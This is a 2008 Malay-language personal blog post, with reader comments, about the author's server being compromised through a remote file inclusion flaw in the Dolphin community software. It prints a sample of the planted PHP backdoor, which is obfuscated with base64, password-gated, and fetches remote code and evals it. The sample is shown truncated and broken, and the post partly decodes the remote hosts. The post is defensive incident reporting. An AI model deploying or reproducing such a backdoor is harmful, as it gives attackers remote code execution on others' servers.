Blogs Dicerobohi?
by Najib Hassan on Dec.13, 2008, under Computing, Virus
Dicerobohi? mendengar perkataan itu saja mampu buat anda terfikir banyak pekara. Apa dah jadi? macan mana boleh berlaku? apa yang menyebabkan ia berlaku? ape ape ape apekah? 
Exploit Code Detection
Pusat data blogs Nj telah dinodai oleh makhluk perasit yang tidak berhati perut 
ia dipercayai telah dinodai pada 11.12.2008 UTC 7.56. Pasukan Siasatan Jenayah Siber a.k.a V.I.T telah diarahkan untuk menyiasat kejadian aneh ini, Turut merasa aneh dengan kejadian ini adalah encik X3. X3 menyatakan Dinding Api (Firewall) Database Server tidak mengalami atau menunjukkan sebarang masalah pada hari kejadian tersebut (11.12.2008). Beliau telah memeriksa Logs Dinding Api tapi tidak menemui apa apa bukti yang menunjukkan perasit memasuki melalui Server Database tersebut. Salah seorang dari Pasukan V.I.T a.k.a N13 menyatakan bahawa beliau telah mengeluarkan amaran tentang Exploit Code yang digunakan oleh perasit ini 2 tahun yang lepas bertarikh ( Sun, 13 Aug 2006 14:56:24 -0600), Beliau tidak menyangka Exploit Code ini masih lagi dapat digunakan pada hari ini. Beliau menjelaskan bahawa Exploit ini dibuat khusus untuk pengguna Dolphin. (Community Software). Exploit Code ini membolehkan perasit mengawal system anda dari jauh.
Beliau menjelaskan lagi lagi tentang Exploit Code ini. 
“The software does not properly validate user-supplied input in the ‘dir[inc]‘ parameter. A remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.”
Amaran Level 3 untuk Web Administrator, Bloggers Administartor.
Exploit found
Sila periksa Directory system anda, Jika anda ternampak 2 files tersebut sila perhatikan code tersebut. Lihat contoh Exploit Code dibawah
`
<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$(isset(isisset($_REQUEST["q"])&&md5($_REQUEST["q"])==”441242fb9d58fd0c2144f247aab3e2de”) $f=$_REQUEST["id"];if((include(base64_decode(”aHR0cDovL2FkczIu“).if($c=file_get_contents(base64_decode(”aHR0cDovLzcu“).$f.$z))eval($c);else{$cu=curl_init(base64_decode(“aHR0cDovLzcxLg==“).$f.$
`
Code ini telah encrypt menggunakan “64 Encoder”
Sebahagian code yang telah dileraikan
cGhwc2VhcmNoLmNu = phpsearch.cn
aHR0cDovL2FkczIu= http://ads2.
aHR0cDovLzcu= http://7.
aHR0cDovLzcxLg= http://71.
Sekian terima kasih…setelah penat lelah 2 hari menjejaki perasit ini Nj ingin menyampaikan pesanan kepada perasit ini
“Dont Play-Play With Us”
Leave a Reply
-
Howdy. Welcome to Najib'Palace!
Thanks for dropping by! Feel free to join the discussion by leaving comments, and stay updated by subscribing to the RSS feed. See ya around!
Need Support? Msg me!
Fairuji Kizura- im in rank..hehe January 3, 2009
- Hati.Gadeez
- pom2 gurl.... December 17, 2008
December 13th, 2008 on 11:07 pm
ades.sile la del kumen ats ye.
kamu explain prvately kt jaja t k.
December 14th, 2008 on 1:16 am
weh aku xpaham..
kena hack ke??
December 14th, 2008 on 6:06 am
kurang fahamlah..hehe
x reti lansung dalam bab ni.. haha
tapi klau kat firewall x de kesan..
mungkin orang yg buat tu dah ada
backdoor.. so klau x tutup bila2
masa dia bleh msk..hehe
December 14th, 2008 on 10:03 am
Cik jaja: Data Center saya telah dinodai oleh perasit perasit ini seterusnya perasit ini menanam backdoor “Pintu belakang” ke seluruh directory² yang ada di dalam Data Center “ariyako.org” ini.
Callister: anda tidak faham? dipendekkan cerita “directory server saya telah kena dinodai” perasit tersebut telah menanam anak anak beliau di setiap pelusuk directory host ariyako.org. Ini menyebabkan saya terpaksa bertindak menjadi kejam dengan membunuh anak anak beliau tanpa rasa belas kasihan
izzat aziz: ada 2 kemungkinan perasit tersebut boleh memasuki sistem.
Pertama: Melalui Internet ( ini mungkin Dapat Dikesan / tidak dapat dikesan melalui firewall )
Kedua: Kaedah Manualy Spread. Iaitu perasit ini mempunyai connection dgn “orang dalam” untuk menolong beliau menanam anak anak beliau di data server kami. Hmmm jika ini benar..siapakah orang itu?
December 14th, 2008 on 3:14 pm
ow mcm 2 ek..
jadik pembunuh la ko ni??
aku report polis ek??
December 14th, 2008 on 4:09 pm
saya membunuh untuk menjaga keharmonian penduduk saya. Jika itu boleh membuatkan saya dihukum undang² saya rela dipersalahkan untuk sesuatu yang benar.
December 14th, 2008 on 4:39 pm
bestnya.. nanti nak bunuh jugak la kalau ada.. best jugak kan? delete fail dalam server sendiri.. haha.. cuba ko chek kot2 blog aku pun ada.. seram jugak nih..
December 14th, 2008 on 7:20 pm
Apis: Untuk melihat samada blog apis dinodai oleh perasit ini sila lihat main directory root blog apis. Langkahnya
Login cpanel > File managers > public_html dan lihat jika ternampak files bermula dengan 02XXXX.PHP
December 15th, 2008 on 10:42 am
phew.. takda.. kite tak pakai cpanel.. hosting luar negara giteww..
ko nyer web admin wat pasal kot.. haha
December 16th, 2008 on 7:26 pm
waaaaaaa tak pakai cpanel? hosting luar negara? abies nak manage mcm mana? takkan via comand line kot..hebat~